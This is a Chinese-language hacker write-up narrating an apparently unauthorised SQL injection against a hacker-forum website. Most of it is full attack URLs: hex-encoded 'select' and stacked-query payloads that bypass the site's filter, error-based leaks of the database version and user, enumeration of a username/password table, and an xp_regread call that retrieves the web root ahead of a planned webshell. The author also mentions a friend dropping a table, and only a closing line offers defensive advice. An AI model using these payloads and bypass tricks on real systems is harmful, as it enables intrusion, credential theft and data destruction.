最后的战役--[第三次注入中国黑客联盟]文:小生
帮黑夜找一个工具,又去了黑客基地看了一眼,我晕,又是枫三少的照片挂在上面(n年前就是这样了,三少,挂照片好爽?^-^),我倒!看看黑基有什么注入漏洞先。我找啊找,找到了论坛。看到一个叫《[原创]对中国黑客联盟的二次渗透》,是某人写的。我直觉告诉我,这个什么中国黑客联盟应该还有漏洞(别丢鸡蛋,我很少去这样的站)。已经被人黑了2次了,也不差我了吧。我再来!
地址http://www.chinahacker.com/article/list.asp?id=891,测试开始吧。
测试一:http://www.chinahacker.com/article/list.asp?id=891’
返回:你提交的数据有错,不要老喜欢搞我啦,Kender留言
个人判断:过滤了’
测试二:http://www.chinahacker.com/article/list.asp?id=891%20and%201=1
返回:正常
个人判断:应该可以去死了,只过滤了’。
而且是mssql的数据库,我最喜欢。然后我想可能还过滤了select之类的吧。这次真是好玩。我想了想用16进制,这里我用了一个工具,是裤衩写的HEXSQL。由于枫三少已经写了有article表了,我是一个很懒的人。提交如下:http://www.chinahacker.com/article/list.asp?id=891%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30
其实就是http://www.chinahacker.com/article/list.asp?id=891 and (select count(*) from article)>0
返回正常,我是个很喜欢drop表的人来的。看看;能不能先
http://www.chinahacker.com/article/list.asp?id=891;
oh,shit,过滤了。再来一下先。
http://www.chinahacker.com/article/list.asp?id=891%3B,又可以了。
提醒黑客联盟一下吧。这里更好玩!http://www.chinahacker.com/soft/show.asp?id=401%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30
玩认真的了。
连接用户:
%20and%20%75%73%65%72%3E%30代表 and user>0
返回[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'ChinaHacker.com.Article' 转换为数据类型为 int 的列时发生语法错误。
Sql信息:
%20and%20%31%3D%28%73%65%6C%65%63%74%20%40%40%56%45%52%53%49%4F%4E%29 代表 and 1=(select @@VERSION)
返回[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。
用户权限:
省略n个测试,反正不是sa权限。
接下来是暴表,暴字段。这里我要感谢一个人,小竹。暴表就舒服多了啊。用不着慢慢猜。
一暴有这样的表wodoubuzhidaoshuoshenmehao。字段名id,username,password。就差不多了,继续暴,我是很懒的人来的。不会一个一个去猜的。
不如backup a webshell 吧。
得到库名为ChinaHacker.com.Article
创建一个表先http://www.chinahacker.com/article/list.asp?id=891%3B%63%72%65%61%74%65%20%74%61%62%6C%65%20%5B%64%62%6F%5D%2E%5B%78%62%6C%75%65%5D%20%28%5B%35%34%62%6F%62%5D%5B%63%68%61%72%5D%28%32%35%35%29%29%3B%2D%2D
到绝对路径了
http://www.chinahacker.com/article/list.asp?id=891%3B%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%45%58%45%43%20%6D%61%73%74%65%72%2E%64%62%6F%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%6F%6E%74%72%6F%6C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33%53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%2C%20%40%72%65%73%75%6C%74%20%6F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%78%62%6C%75%65%20%28%35%34%62%6F%62%29%20%76%61%6C%75%65%73%28%40%72%65%73%75%6C%74%29%3B%2D%2D
得到绝对路径为:d:\chinahacker
有个notdown表啊,小路帮我drop了,果然是老手,我还没有想到,小路简直是我偶像,要多多向他学习一下才行。这里要谢谢小路对我的帮忙,谢谢了。
这次纯粹是为了玩,没有drop表,没有update文章系统。Kender不要找我麻烦。我怕怕。
我认为,想防止再发生的话。最好就让数字只能是数字好了,搜索那里过滤就照原来一样。具体可以看看小竹的《SQL注入天书 - ASP注入漏洞全接触》的最后那部分的防范处理